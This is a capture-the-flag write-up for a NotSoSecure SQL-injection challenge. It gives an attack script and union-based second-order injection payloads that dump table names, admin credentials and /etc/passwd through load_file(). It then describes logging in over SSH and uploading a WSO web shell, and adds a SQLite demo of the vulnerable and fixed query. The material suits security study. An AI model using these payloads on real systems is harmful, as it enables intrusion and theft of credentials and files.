Access the challenge through a proxy such as Burp or ZAP and submit the login form. Notice that the request is forwarded to:
http://ctf.notsosecure.com/71367217217126217712/checklogin.php, which contains: 7365637265745f72656769737465722e68746d6c
This is a hex string; decoding it in Python with '7365637265745f72656769737465722e68746d6c'.decode('hex') reveals secret_register.html:

```
>>> '7365637265745f72656769737465722e68746d6c'.decode('hex')
'secret_register.html'
```
The registration page offers four fields. Registering creates a session_id cookie, base64 encoded, that contains your email.
A hint published on Twitter (https://twitter.com/notsosecure/status/389714333061500928) pointed at magic_quotes. It is a big hint!
We 'python-automated' our attack:
```python
#!/usr/bin/python
# usage: python x.py <name> <password> <email>
from requests import get, post
from sys import argv
from urllib import unquote

name = argv[-3]
password = argv[-2]
email = argv[-1]
print 'name:', name
print 'password:', password
print 'email:', email

url1 = 'http://ctf.notsosecure.com/71367217217126217712/register.php'
url2 = 'http://ctf.notsosecure.com/71367217217126217712/checklogin.php'
url3 = 'http://ctf.notsosecure.com/71367217217126217712/uber_secret.php'

# 1. register with the (injected) name, 2. log in with it, 3. fetch the
# secret page and decode the session_id cookie it sets
r = get(url1, params={'regname': name, 'regemail': email,
                      'regpass1': password, 'regpass2': password})
r = post(url2, data={'myusername': name, 'mypassword': password}, cookies=r.cookies)
r = get(url3, cookies=r.cookies)
print 'cookie:', unquote(r.cookies['session_id']).decode('base64')
```
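As an added example (not the write-up's code), here is a constructed SQLite model of the flow the script drives: a name accepted through a safe, parameterised INSERT at registration is later used by a second query that concatenates the stored value into SQL. The vulnerable pattern on the secret page is an assumption, since the challenge's PHP is not on the page; the payload is the write-up's third one adapted to SQLite syntax, and the fixed function shows the same lookup with the stored value bound as a parameter.

```python
import sqlite3

# Constructed stand-in for the challenge application; the column names match
# the table the write-up dumped, the row contents are placeholders.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT, email TEXT);
        INSERT INTO users(name, password, email)
            VALUES ('admin', 'ADMIN_PW_PLACEHOLDER', 'admin@example.com');
    """)
    return db

def register(db, name, password, email):
    # Registration binds its parameters: the payload is stored as a plain
    # string and cannot hurt this statement.
    db.execute("INSERT INTO users(name, password, email) VALUES (?, ?, ?)",
               (name, password, email))

def secret_page_vulnerable(db, login_name):
    # Assumed second query: the stored name is re-read and concatenated into
    # SQL, so escaping or binding at the input boundary no longer helps.
    stored = db.execute("SELECT name FROM users WHERE name = ?",
                        (login_name,)).fetchone()[0]
    row = db.execute("SELECT email, id FROM users WHERE name = '" + stored + "'").fetchone()
    return row[0] if row else None

def secret_page_fixed(db, login_name):
    # Same lookup with the stored value bound: the union payload is just text
    # and the query only ever returns the caller's own row.
    stored = db.execute("SELECT name FROM users WHERE name = ?",
                        (login_name,)).fetchone()[0]
    row = db.execute("SELECT email, id FROM users WHERE name = ?", (stored,)).fetchone()
    return row[0] if row else None

# The write-up's final payload in SQLite form (|| instead of multi-arg GROUP_CONCAT).
PAYLOAD = ("-1' union select group_concat(id||name||password||email),2 "
           "from users where name='admin' -- -")

def demo():
    db = make_db()
    register(db, PAYLOAD, "a", "a")
    # vulnerable page leaks the admin row; fixed page returns the attacker's own email
    return secret_page_vulnerable(db, PAYLOAD), secret_page_fixed(db, PAYLOAD)
```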
First, the table name (users):

```
root@bt:~# python x.py "-1' union select GROUP_CONCAT(table_name),2 FROM information_schema.tables where table_schema!='information_schema' -- -" "a" "a"
name: -1' union select GROUP_CONCAT(table_name),2 FROM information_schema.tables where table_schema!='information_schema' -- -
password: a
email: a
seesion_id: users dXNlcnM%3D
```
Then the columns of that table:

```
root@bt:~# python x.py " -1' union select GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_name = 'users' -- -" "a" "a"
name: -1' union select GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_name = 'users' -- -
password: a
email: a
seesion_id: id,name,password,email aWQsbmFtZSxwYXNzd29yZCxlbWFpbA%3D%3D
```
Finally, the admin row:

```
root@bt:~# python x.py " -1' union select GROUP_CONCAT(id,name,password,email),2 FROM users where name='admin' -- -" "a" "a"
name: -1' union select GROUP_CONCAT(id,name,password,email),2 FROM users where name='admin' -- -
password: a
email: a
seesion_id: 1adminsqlilabRocKs!!admin@sqlilabs.com MWFkbWluc3FsaWxhYlJvY0tzISFhZG1pbkBzcWxpbGFicy5jb20%3D
```
We log in with admin:adminsqlilabRocKs and get the flag: «Well done, Flag is 815290. 2nd flag is in file secret.txt»
We use the same script to read /etc/passwd through load_file(). The GECOS field of the user temp123 gives away the password weakpassword1.
```
root@bt:~# python x.py " -1' union select load_file('/etc/passwd'),2 -- -" "a" "a"
name: -1' union select load_file('/etc/passwd'),2 -- -
password: a
email: a
seesion_id:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:107:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ctf:x:1000:1000:,,,:/home/ctf:/bin/bash
temp123:x:1001:1001:weakpassword1:/home/temp123:/bin/sh
ntop:x:108:116::/var/lib/ntop:/bin/false
```
Login time, over SSH:

```
temp123@ctf.notsosecure.com's password:
Welcome to Ubuntu 12.04.3 LTS (GNU/Linux 3.8.0-29-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Oct 25 08:47:07 BST 2013

  System load:  0.0               Processes:           174
  Usage of /:   4.5% of 28.18GB   Users logged in:     2
  Memory usage: 3%                IP address for eth0: 88.208.239.33
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/

Last login: Fri Oct 25 08:37:55 2013 from cpc26-cmbg15-2-0-cust101.5-4.cable.virginm.net
$ pwd
/home/temp123
```
Upload a WSO shell into the user's public_html, read the second flag, then delete the PHP shell:

```
$ cat /secret.txt
Well done, 2nd Flag is 128738213812990.
```
email both the flags to ctf@notsosecure.com with subject CTF FLAGS!
make sure you delete all the files you have created on the server so you don't allow other users easy points by using the files left by you on the server.
Please provide a detailed write up to qualify for cash prize!
The person with best write-up wins. You are allowed to publish the write-up on public site, but please do this after the CTF has finished (Sunday, 27th October).
Hope you enjoyed the CTF. This was taken from one of challenges we have on SQLi Labs. To practice more on this visit our SQLi Labs.
The next public CTF will take place in December.
Thanks
Sid
References & URLs
http://ctf.notsosecure.com/leaderboard/